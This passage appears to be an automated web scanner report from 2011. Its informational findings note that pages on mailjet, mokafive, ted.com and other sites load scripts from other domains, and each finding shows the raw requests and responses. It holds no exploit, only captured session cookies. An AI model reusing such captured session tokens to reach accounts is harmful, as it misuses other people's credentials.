Set-Cookie: mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZiiMnbi9ugqDp6%2FHctqrJKdkVhhzWLhZIYqvV8VtE5HormQSeGnd4V7fV0vXi1RwUgvmfAKIz4GwwMjQ84mEQzp0JsUa96%2Fl2PR9k5%2BOk6WT3hefeiCrKnbfqoHUQb9ygs0sjfnn4mVuYVXwDg3%2B8LrQC5swXDqzquzXXFp9NM1LSA1qen45s1F2PprXAmVxULCj%2FqTlKHWUxK%2FCujHVLgIX3QaHWvBpH5y7UxTxintKiXaCW3xJzPaP9EzmPSvzjfEflPWhyC2VyUmV11fXShRG7FK25Ur4HmeQYJdJUzWHzG3OzBRBuuLy7%2FsgsLz73rneCrTBtaE0j4Izx5POpBgHKaQvzv6rrmpn7fImRObB0ieRTw8KoAN7iaU4ZWYi4QXrdvEibUV1xax0xS%2FSa1ToPtH41IbEET25cAW8VjLsXyxdr6gwo4PladoWYA3j4Dj4E9NiCUrXLHfNogcpi5jN94yClibewZHh3k%2Fa5cJaUdr1JxAsD2L2D%2FzW1R%2FKnlS%2FTgwVa%2BW4EefBnKq%2BobeDWBOnGcmwjjWy647PhbabVd4z6jG3QS2E1ysRk5ajn1%2FCHhV01AEpshLxUtBRpcHL; expires=Fri, 23-Sep-2011 21:54:54 GMT; path=/; domain=.mailjet.com
Content-Type: text/html; charset=utf-8
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Pricing plans - mailjet.com</
...[SNIP]...
<!-- ++++++ JAVASCRIPTS +++++ -->

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script src="https://livechat.iadvize.com/chat_button.js?sid=1821&amp;onimg=http://www.mailjet.com/images/theme/v1/bg/blank.gif&amp;offimg=http://www.mailjet.com/images/theme/v1/bg/blank.gif" type="text/javascript"></script>
...[SNIP]...

18.170. https://www.mailjet.com/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mailjet.com
Path:   /signup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /signup HTTP/1.1
Host: www.mailjet.com
Connection: keep-alive
Referer: http://www.mailjet.com/pricing
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.mailjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZihPBS2aHbLPcJsh6zMrtsk5VBdWC2Q4%2FkY28R9i6SSa8dGAVUF8%2FPHumHv5F7VKYeMBcuJ3ocAQC8%2F1zpjTEa2eAIF2%2Fd1MaVsJjlYd%2BEvlsPy4Bruem8u21CL9yz8Ap%2Bo%2BCyjRIR52HCoEp7Gk2hMyvFZOK%2Fjx%2BGyh7%2Fsu8NFSZJ6LqVEMBAyL0NbwqKufi7iGB%2Fv%2F9tP9%2BJn57nRT7jf0OSu%2BSPaMMJ8CfmvGgjKuJr3Z3pjiI0Og8n2P%2BMDPxM5rZyhpW1H5bV6WiztfbkT5g%2BTxq5Sr9hjD093jyLRosfaux9DQuY9RcGBtBWydBnI%2FakIBZf1Gn%2FuhZ530ibuwBdDE3AAckB%2BX%2BQrsXYlox4bwiU%2BKUBCyOImviEfwVersfFPKJQTWs9BG6BLGawt5EAPShjQ3ZpGsRqD6D4DgBt8uEV0jSSUO5Nj9HsCmW6vnbM9Bc%2BhVI8FqYz2j4YkPtqWtgVhuS41Vo00JKJGreh2otpfEl3yl5R6F7KRY3%2BGclQqwvpHsWkNErB2NRzbFk4I3S%2FINHLVFnH2fvlkerYTMa%2B6iqgaqFGiaNLmKiqxdhh5hbqRCvPphR8CMT7hL; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.3.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

plan_id=38

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:01 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=iQluRDaaB5M5AYtNJtKxLETKPFlyZG2Bb7aOz31g0XcJh051qecDn7WucsCQ5sPWMgov3crx%2Fe%2FVKHsfCKjgl0ts693dBbaw%2Bn8Z%2FZBRorc9S8yidBGGXRaEhLryAJRKXu8%2BmD5MfSSdUTArbPeuXqQTjl2%2Bz9Sps1DERl3gEQpRfzJHQU4%2FwSwXV%2FxG%2F%2B%2FxrLfIRvU4YGR9sNKRhV7Tp8y6xVR%2F406%2FF0NJNO84XVNcH7wVgIoZ%2BDtc6ZqtqYfZNbZ%2Ffsn12Ti6F3wqJfDXrfqEvwXlxxkIL3LWxFPMBsj6GRMSN5Beq9y%2BPikxBZWSpq8SNFZCwRQuOf2iioO708BZnv4AmSVUO2TA2qNfgYDSH75LdyKerW%2BnqWtmWbNib2Ke0irqnRb2LZXI7vbN%2FqlLnObWTqNDuveaarqUwcND3a%2FSRhy9MB5hAXw5SRtmg69SfaKU5IXFco%2F3%2B7CnWJ%2F%2F7VWiEY9c4oqHIUD7f6HMgacyF5JKG%2BefqhRdjC8skgLWP1T%2F07KLzZIrP0dZRJgsTMBLpI%2FYkzvF6CxdxpufVXy5MYalpKk2AIm85yqTw1398l%2Fx3tDNeDOW8EJ4D6%2Fj86oVOWSL2aNXti%2FfnM7wXf2BD9wgdi6H8bNR5Xbf; expires=Fri, 23-Sep-2011 21:55:01 GMT; path=/; domain=.mailjet.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sign up for a free - mailjet.
...[SNIP]...
<!-- ++++++ JAVASCRIPTS +++++ -->

<script type="text/javascript" src="https://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script src="https://livechat.iadvize.com/chat_button.js?sid=1821&amp;onimg=https://www.mailjet.com/images/theme/v1/bg/blank.gif&amp;offimg=https://www.mailjet.com/images/theme/v1/bg/blank.gif" type="text/javascript"></script>
...[SNIP]...

18.171. http://www.mailtraq.com/30day  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailtraq.com
Path:   /30day

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /30day HTTP/1.1
Host: www.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/imap
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200
Cache-Control: private
Connection: close
Date: Fri, 16 Sep 2011 19:49:48 GMT
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: 6464-query=; path=/; HttpOnly;
Set-Cookie: 6464%2Dformreferer=http%3A%2F%2Finfo%2Emailtraq%2Ecom%2Fimap; path=/
Set-Cookie: 6464%2Duserid=%2D3712022; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27682

<html><head><!-- Google Website Optimizer Tracking Script -->
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['gwo._setAccount', 'UA-19482991-2']);
_gaq.push(['gwo._trackPagevi
...[SNIP]...
</script><SCRIPT src="http://www.google-analytics.com/urchin.js" type=text/javascript>
</SCRIPT>
...[SNIP]...

18.172. http://www.matrix42.com/fileadmin/jScripts/video_box.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.matrix42.com
Path:   /fileadmin/jScripts/video_box.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fileadmin/jScripts/video_box.js HTTP/1.1
Host: www.matrix42.com
Proxy-Connection: keep-alive
Referer: http://www.matrix42.com/downloads/wp-vdi-demystified/?gclid=CLGJxqyCo6sCFWYbQgodY3FG1w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=721gl7390nj2pm26demj4h2ha7; fe_typo_user=8fd7138ee5b020a91ffe719a02122e94

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:32 GMT
Server: Apache/2.2
Last-Modified: Mon, 04 Apr 2011 10:20:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: must-revalidate
Content-Length: 6347
Content-Type: application/x-javascript

function ShowHideLayer(id) {
   var v = document.getElementById(id).style.visibility;
   if(v == "visible") {
       document.getElementById(id).style.visibility = "hidden";
   } else {
       document.getElementById
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

18.173. http://www.mokafive.com/BetterWayVDI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /BetterWayVDI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
   <title>VDI the way it should be | MokaFive</title>
   <meta name=
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...

18.174. http://www.mokafive.com/products/compare-mokafive.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /products/compare-mokafive.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/compare-mokafive.php HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/products/products-overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.20.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop; _lf1.acr_=Compare

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:27:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 25199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
   <title>MokaFive vs VDI and Traditional | MokaFive</title>
   <met
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...

18.175. http://www.mokafive.com/products/products-overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /products/products-overview.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/products-overview.php HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/solutions/outsourcing.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.17.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop; _lf1.acr_=products

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:27:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 23302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Overview of MokaFive | MokaFive</title>
   <meta name="de
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...

18.176. http://www.mokafive.com/solutions/desktop-and-laptop-management.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /solutions/desktop-and-laptop-management.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /solutions/desktop-and-laptop-management.php HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/solutions/solutions-overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.8.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop; _lf1.acr_=Desktop%20and%20Laptop%26nbsp%3BManagement

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:26:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 20955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Desktop and laptop management | MokaFive</title>
   <meta
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...

18.177. http://www.mokafive.com/solutions/outsourcing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /solutions/outsourcing.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /solutions/outsourcing.php HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/solutions/solutions-overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.14.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop; _lf1.acr_=Contractors%20and%20Outsourcing

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:26:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 20875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Outsourcing | MokaFive</title>
   <meta name="description
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...

18.178. http://www.mokafive.com/solutions/solutions-overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mokafive.com
Path:   /solutions/solutions-overview.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /solutions/solutions-overview.php HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.5.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop; _lf1.acr_=solutions

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:26:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 21093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Overview | MokaFive</title>
   <meta name="description" c
...[SNIP]...
<!-- START predictiveresponse tracking code -->
<script type="text/javascript" src="http://www.client.predictiveresponse.net/trac.js"></script>
...[SNIP]...

18.179. http://www.radius-server.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radius-server.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:33 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 14467

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>RADIUS Server - Aradial AAA/RADIUS server for RADIUS billing</TITLE>
<meta name="description" content="Aradial
...[SNIP]...
</center>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.180. http://www.spotngo.ca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spotngo.ca
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.spotngo.ca
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:54 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 06 May 2010 18:05:19 GMT
ETag: "119903e0-3bdc-485f0c913b5c0"
Accept-Ranges: bytes
Content-Length: 15324
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>Spotngo Hotspot Services and Hotspot Software Provider</TITLE>
<meta name="description" content="Hotspot & Wireless LAN internet provider, WISP/WiMAX/Hotspot/Wifi Software pr
...[SNIP]...
</DIV>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.181. http://www.ted.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ted.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:50:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Content-Length: 41573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js"></script>
...[SNIP]...

18.182. http://www.ted.com/initiatives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /initiatives

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /initiatives HTTP/1.1
Host: www.ted.com
Proxy-Connection: keep-alive
Referer: http://www.ted.com/themes/browse
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=6set1tc5ierqdp0l3oltlsf2f0; __utma=37353509.509986736.1316239813.1316239813.1316239813.1; __utmb=37353509.2.10.1316239813; __utmc=37353509; __utmz=37353509.1316239813.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=lgc32p9t3asgv2ad.1316239816249

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:51:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Content-Length: 12545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js"></script>
...[SNIP]...

18.183. http://www.ted.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?q=xss HTTP/1.1
Host: www.ted.com
Proxy-Connection: keep-alive
Referer: http://www.ted.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=6set1tc5ierqdp0l3oltlsf2f0; __utma=37353509.509986736.1316239813.1316239813.1316239813.1; __utmb=37353509.1.10.1316239813; __utmc=37353509; __utmz=37353509.1316239813.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=lgc32p9t3asgv2ad.1316239816249

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:51:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js"></script>
...[SNIP]...

18.184. http://www.ted.com/themes/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /themes/browse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /themes/browse HTTP/1.1
Host: www.ted.com
Proxy-Connection: keep-alive
Referer: http://www.ted.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=6set1tc5ierqdp0l3oltlsf2f0; __utma=37353509.509986736.1316239813.1316239813.1316239813.1; __utmb=37353509.2.10.1316239813; __utmc=37353509; __utmz=37353509.1316239813.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=lgc32p9t3asgv2ad.1316239816249

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:51:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Content-Length: 34111

